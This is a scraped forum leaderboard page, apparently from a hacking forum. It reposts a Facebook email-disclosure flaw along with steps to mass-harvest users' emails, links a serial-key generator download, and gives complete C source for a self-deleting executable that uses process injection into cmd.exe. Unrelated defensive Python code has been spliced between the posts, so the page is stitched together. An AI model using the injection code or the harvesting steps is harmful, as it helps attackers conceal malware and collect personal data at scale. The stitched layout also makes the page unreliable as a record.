
Leaderboard

Popular Content

Showing content with the highest reputation on 07/15/13 in all areas

  1. When you sign up on Facebook, you have to enter an email address, and that email address becomes your primary email address on Facebook. In a recent disclosure by a security researcher, Stephen Sclafani, the social networking site Facebook was vulnerable to disclosure of the primary email address of any Facebook user to hackers and spammers.

     The flaw resides in the invitation mechanism of Facebook, using which one can invite all of one's email contacts to Facebook to make a new account. As shown in the following screenshot, an invitation is received by email, where one needs to click the signup URL: After clicking that URL, the invited user is redirected to a signup page filled in with the email address, and the name of a person who used the link to sign up for an account was displayed:

     There are two parameters in this URL, i.e. “re” and “mid”. According to Stephen, changing some part of the "mid" parameter can expose the email address of another user.

     http://www.facebook.com/r.php?re=245bf2da75118af20d917bdd34babddb&mid=59b63aG5af3107aba69G0G46

     59b63a G 5af3107aba69 G 0 G 46

     He explained that, in the above string, “G” acts as a delimiter/separator, where the 2nd value, after the first “G”, i.e. 5af3107aba69, is the profile ID of the user. Replacing the user ID can expose the email ID of any user in the signup page. An attacker can obtain this numerical ID of a Facebook profile from the Graph API.

     Using this flaw, an attacker can extract the email addresses of all Facebook profiles for spamming or hacking purposes. The attacker just needs to write an automated script/code to grab all email addresses of billions of Facebook users. Using the following steps, a hacker can write automated code to grab all emails:

     1.) Grab profile links of all Facebook users from the Facebook People Directory, i.e. A A | azusa sakata | Director de persoane | Facebook
     2.) Collect the numerical Facebook ID for each profile from the Facebook Graph API, i.e. The Hacker News
     3.) In the next step, using curl or other methods, open the modified URL for each profile, i.e. http://www.facebook.com/r.php?re=245bf2da75118af20d917bdd34babddb&mid=59b63aG1251386282G0G46
     4.) Filter the email address exposed in the source code obtained from the above step for each profile and store it in a database.

     This way, the above vulnerability was able to put every Facebook user at risk, but Stephen's responsible disclosure to the Facebook Security team saved us. He was rewarded with $3,500 for helping them patch this flaw.

     Vulnerability in Facebook discloses Primary Email Address of any account - TheHackerNews
    2 points
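
A defensive illustration of the flaw described in item 1, added here and not taken from the article or from Facebook's code: the `mid` value carried a client-editable profile ID, so a server that trusts it must first authenticate every field against the invitation. The key, the 4-field layout plus trailing tag, and the `issue_mid`/`verify_mid` helpers are assumptions; the `G` delimiter and sample values follow the post.

```python
import hashlib
import hmac
from typing import List, Optional

SERVER_KEY = b"constructed-demo-key"  # assumption: server-side secret, never sent to clients
DELIM = "G"                            # field separator seen in the post's mid value
FIELD_COUNT = 4                        # the post's mid value has four fields


def _tag(re_token: str, fields: List[str]) -> str:
    """MAC over the invitation token (re) and every mid field, in order."""
    msg = "\x00".join([re_token, *fields]).encode()
    # Lower-case hex never contains the upper-case delimiter.
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()[:32]


def issue_mid(re_token: str, fields: List[str]) -> str:
    """Build a mid value whose last field authenticates the others."""
    if len(fields) != FIELD_COUNT:
        raise ValueError("unexpected number of fields")
    for f in fields:
        if DELIM in f or not f.isalnum():
            raise ValueError("field must be alphanumeric and free of the delimiter")
    return DELIM.join([*fields, _tag(re_token, fields)])


def verify_mid(re_token: str, mid: str) -> Optional[List[str]]:
    """Return the fields if untampered, else None (render a blank signup form)."""
    *fields, tag = mid.split(DELIM)
    if len(fields) != FIELD_COUNT:
        return None
    expected = _tag(re_token, fields).encode()
    # Constant-time comparison; bytes avoid a TypeError on non-ASCII input.
    if not hmac.compare_digest(tag.encode(), expected):
        return None
    return fields


if __name__ == "__main__":
    re_token = "245bf2da75118af20d917bdd34babddb"            # value from the post
    mid = issue_mid(re_token, ["59b63a", "5af3107aba69", "0", "46"])
    parts = mid.split(DELIM)
    parts[1] = "1251386282"                                  # edited profile ID, as in the post
    print(verify_mid(re_token, mid), verify_mid(re_token, DELIM.join(parts)))
```

A MAC only detects editing of the link. The prefilled address should still come from the server-side invitation record tied to `re`, not from any profile ID the client supplies.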
  2. Program for generating serial codes online. Works very well. https://www.youtube.com/watch?v=CNyeHlPBko0 Download: https://docs.google.com/file/d/0B4BhpTKoOhz7ZmZHblFiVWItUkU/edit?pli=1 Scan on Anubis
    1 point
  3. Invite us too when you get your ID cards. Drinks are on us. We'll save up money until then. report //embarrassing! Have a little self-respect!
    1 point
  4. A nasty new phishing campaign that aims to harvest Twitter login credentials is doing the rounds. The scam typically appears in the shape of direct messages to prospective marks from one of their contacts. Attackers are using messages such as "This person is threatening to expose something bad about you" with a link.

     The link takes prospective victims (who may be concerned they are about to be slandered or worse) to a dodgy site (twitller.com), which poses as a login to Twitter. Victims are encouraged to hand over their login credentials which are then used to take over compromised accounts and send more intimidating messages.

     "This is a nasty trick especially when the sender is someone you know and trust. If you receive a suspicious DM or email from a person you know and trust, just warn him/her – the account is most likely hijacked and controlled by the attackers," security blogger Janne Ahlberg warns.

     A quick Twitter search on a key phrase suggests that the scam might have flared up around Thursday and run into the weekend. No more than a handful of people reported seeing it, so we appear to be talking about a low level or unsuccessful scam. Any typo-squatting site associated with the attack is likely to get squashed but this won't stop the ruse re-appearing under a slightly different guise or featuring a different site. Let's be careful out there.

     The motives, much less the perpetrators of the Twitter phishing campaign, are unknown. Possible motivations might be the use of compromised accounts to send messages advertising dodgy diet sites (earning marketing affiliate revenue in the process), or the use of compromised Twitter account login credentials to break into other services (email, Facebook etc). This latter trick is only possible thanks to the widespread but hopelessly insecure practice of using the same password on multiple websites. ®

     Source: TheRegister.co.uk
    1 point
  5. Self-deleting executable
     by zwclose7

     This is another example of PE injection. This program will create a suspended cmd.exe process, and then inject the executable image into the child process. A user-mode APC is then queued to the child process's primary thread. Finally, the thread is resumed and the injected code is executed. The injected code calls the DeleteFile function to delete the original executable file.

     1) Get the PE header of the program using RtlImageNtHeader.
     2) Create a suspended cmd.exe using the CreateProcess function.
     3) Allocate executable memory in the child process.
     4) Relocate the executable image, and then write it to the child process using the NtWriteVirtualMemory function.
     5) Queue a user-mode APC to the child process's primary thread.
     6) Resume the primary thread using the NtResumeThread function.
     7) The primary thread executes the injected code.
     8) The injected code calls the DeleteFile function to delete the original executable file.
     9) The injected code calls the ExitProcess function to terminate the cmd.exe process.

         #include <Windows.h>
         #include <winternl.h>

         #pragma comment(lib,"ntdll.lib")

         EXTERN_C PIMAGE_NT_HEADERS NTAPI RtlImageNtHeader(PVOID);
         EXTERN_C NTSTATUS NTAPI NtWriteVirtualMemory(HANDLE,PVOID,PVOID,ULONG,PULONG);
         EXTERN_C NTSTATUS NTAPI NtResumeThread(HANDLE,PULONG);
         EXTERN_C NTSTATUS NTAPI NtTerminateProcess(HANDLE,NTSTATUS);

         char szFileName[260];

         /* Runs inside the child process (steps 7-9). */
         void WINAPI ThreadProc()
         {
             while(1)
             {
                 Sleep(1000);
                 if(DeleteFile(szFileName))
                 {
                     break;
                 }
             }
             ExitProcess(0);
         }

         int WINAPI WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR lpCmdLine,int nCmdShow)
         {
             PIMAGE_NT_HEADERS pINH;
             PIMAGE_DATA_DIRECTORY pIDD;
             PIMAGE_BASE_RELOCATION pIBR;
             HMODULE hModule;
             PVOID image,mem,StartAddress;
             DWORD i,count,nSizeOfImage;
             DWORD_PTR delta,OldDelta;
             LPWORD list;
             PDWORD_PTR p;
             STARTUPINFO si;
             PROCESS_INFORMATION pi;

             /* Step 1: locate our own image and its PE header. */
             GetModuleFileName(NULL,szFileName,260);
             hModule=GetModuleHandle(NULL);
             pINH=RtlImageNtHeader(hModule);
             nSizeOfImage=pINH->OptionalHeader.SizeOfImage;

             memset(&si,0,sizeof(si));
             memset(&pi,0,sizeof(pi));

             /* Step 2: create the suspended child. */
             if(!CreateProcess(NULL,"cmd.exe",NULL,NULL,FALSE,CREATE_SUSPENDED|CREATE_NO_WINDOW,NULL,NULL,&si,&pi))
             {
                 return 1;
             }

             /* Step 3: allocate executable memory in the child. */
             mem=VirtualAllocEx(pi.hProcess,NULL,nSizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
             if(mem==NULL)
             {
                 NtTerminateProcess(pi.hProcess,0);
                 return 1;
             }

             /* Step 4: copy the image locally and apply base relocations. */
             image=VirtualAlloc(NULL,nSizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
             memcpy(image,hModule,nSizeOfImage);

             pIDD=&pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
             pIBR=(PIMAGE_BASE_RELOCATION)((LPBYTE)image+pIDD->VirtualAddress);

             delta=(DWORD_PTR)((LPBYTE)mem-pINH->OptionalHeader.ImageBase);
             OldDelta=(DWORD_PTR)((LPBYTE)hModule-pINH->OptionalHeader.ImageBase);

             while(pIBR->VirtualAddress!=0)
             {
                 if(pIBR->SizeOfBlock>=sizeof(IMAGE_BASE_RELOCATION))
                 {
                     count=(pIBR->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/sizeof(WORD);
                     list=(LPWORD)((LPBYTE)pIBR+sizeof(IMAGE_BASE_RELOCATION));

                     for(i=0;i<count;i++)
                     {
                         if(list[i]>0)
                         {
                             p=(PDWORD_PTR)((LPBYTE)image+(pIBR->VirtualAddress+(0x0fff & (list[i]))));
                             *p-=OldDelta;
                             *p+=delta;
                         }
                     }
                 }
                 pIBR=(PIMAGE_BASE_RELOCATION)((LPBYTE)pIBR+pIBR->SizeOfBlock);
             }

             if(!NT_SUCCESS(NtWriteVirtualMemory(pi.hProcess,mem,image,nSizeOfImage,NULL)))
             {
                 NtTerminateProcess(pi.hProcess,0);
                 return 1;
             }

             /* Steps 5-6: queue the APC on the primary thread, then resume it. */
             StartAddress=(PVOID)((LPBYTE)mem+(DWORD_PTR)(LPBYTE)ThreadProc-(LPBYTE)hModule);
             if(!QueueUserAPC((PAPCFUNC)StartAddress,pi.hThread,0))
             {
                 NtTerminateProcess(pi.hProcess,0);
                 return 1;
             }

             NtResumeThread(pi.hThread,NULL);
             NtClose(pi.hThread);
             NtClose(pi.hProcess);
             VirtualFree(image,0,MEM_RELEASE);
             return 0;
         }

     Source: Self-deleting executable - rohitab.com - Forums
    1 point
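
Detection logic for the sequence in item 5, as an added example that is not part of the original post: it correlates process telemetry to flag a child that is created suspended, then receives an executable allocation, a memory write and an APC from its parent before being resumed, and notes whether the child later deletes the parent's image. The event schema, PIDs and paths are constructed for illustration and do not correspond to any specific product's log format.

```python
# Constructed telemetry. The event schema (type/src/dst/...) is hypothetical,
# standing in for whatever an EDR or ETW consumer actually records.
EVENTS = [
    {"t": 1, "type": "proc_create", "src": 4120, "dst": 5301, "image": "cmd.exe",
     "suspended": True, "src_image": r"C:\Users\a\selfdel.exe"},
    {"t": 2, "type": "remote_alloc", "src": 4120, "dst": 5301, "protect": "RWX"},
    {"t": 3, "type": "remote_write", "src": 4120, "dst": 5301, "size": 86016},
    {"t": 4, "type": "remote_apc", "src": 4120, "dst": 5301},
    {"t": 5, "type": "thread_resume", "src": 4120, "dst": 5301},
    {"t": 6, "type": "file_delete", "src": 5301, "path": r"C:\Users\a\selfdel.exe"},
    # Benign: cmd.exe started normally, deleting a temp file.
    {"t": 7, "type": "proc_create", "src": 700, "dst": 701, "image": "cmd.exe",
     "suspended": False, "src_image": r"C:\tools\build.exe"},
    {"t": 8, "type": "file_delete", "src": 701, "path": r"C:\Temp\obj.tmp"},
]
STAGES = ("remote_alloc", "remote_write", "remote_apc", "thread_resume")


def detect(events):
    """Alert on children created suspended, then written to and APC-started by
    their parent; note whether the child later deletes the parent's image."""
    tracked, alerts = {}, []  # tracked: child pid -> per-child state
    for ev in sorted(events, key=lambda e: e["t"]):
        kind = ev["type"]
        if kind == "proc_create" and ev["suspended"]:
            tracked[ev["dst"]] = {"parent": ev["src"], "image": ev["src_image"],
                                  "next": 0, "alert": None}
        elif kind in STAGES and ev["dst"] in tracked:
            st = tracked[ev["dst"]]
            # Stages must come from the creating parent, in the order the post lists.
            in_order = st["next"] < len(STAGES) and kind == STAGES[st["next"]]
            if ev["src"] != st["parent"] or not in_order:
                continue
            if kind == "remote_alloc" and "X" not in ev["protect"]:
                continue  # the post's loader allocates executable memory (step 3)
            st["next"] += 1
            if st["next"] == len(STAGES):
                st["alert"] = {"parent": st["parent"], "child": ev["dst"],
                               "self_delete": False}
                alerts.append(st["alert"])
        elif kind == "file_delete" and ev["src"] in tracked:
            st = tracked[ev["src"]]
            if st["alert"] and ev["path"].lower() == st["image"].lower():
                st["alert"]["self_delete"] = True
    return alerts
```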
  6. Data can be stored in crystals that can withstand temperatures of 1,000 degrees Celsius. Researchers have demonstrated the ability to read and write data using a five-dimensional recording process in a synthetic crystal, to store massive amounts of data for an unlimited time. The researchers, led by Jingyu Zhang of the University of Southampton, United Kingdom, successfully recorded a 300KB digital copy of a text file on 5D nanostructured glass, using an ultrafast laser and intense pulses. The file was written in three layers of nanostructured dots, separated by five micrometres (five millionths of a metre). The scientists used a femtosecond laser, which emits pulses of light in femtoseconds (one millionth of one billionth of a second). The 5D read/write laser can record up to an estimated 360TB/disc on nanostructured glass, which has thermal stability up to 1,000 degrees Celsius and a practically unlimited lifetime. In a statement given last week, the researchers called the glass the "Superman memory crystal", alluding to the "memory crystals" used in the Superman films to store the collective knowledge about the history and civilization of the planet Kryptonite. The University of Southampton researchers recorded through self-assembled nanostructures created in fused quartz, which they said have the capacity to store immense amounts of data for more than a million years. The encoding of information comes in five dimensions, which include size and orientation in addition to the three-dimensional position of these nanostructures.

     According to a recently published paper, the self-assembled nanostructures change the way light passes through the glass, modifying the polarization of the light, which can then be read by combining an optical microscope and a polarizer, similar to those found in Polaroid sunglasses. The study was carried out as part of a joint project with Eindhoven University of Technology. "We are developing a very stable and safe form of portable memory using glass, which could be extremely useful for organizations with large archives," said Jingyu. "At the moment, companies have to back up their archives every five to ten years, because hard-drive memory has a relatively short lifespan."

     Source: Computerworld - IT news, features, blogs, tech reviews, career advice
    1 point
  7. I'll give 2$ WMZ to report him.
    -1 points
  8. Hi guys Used someone=Easypaycheckformula 2= ?! is scam or make money...and if yes...where we find free ?! Peace and Love !!! ><
    -1 points
  9. Brother... you pray to be saved and you have marijuana in your signature... others drink... swear... sex has become the pleasure of the street... do you think you just have to pray and that's it, you're saved? My friend, before that you have to give those up, change yourself, seek God with all your heart... feel... my friend, I don't only know computer science and math... I'll teach you whatever you want, if you want!
    -1 points
  10. -1 points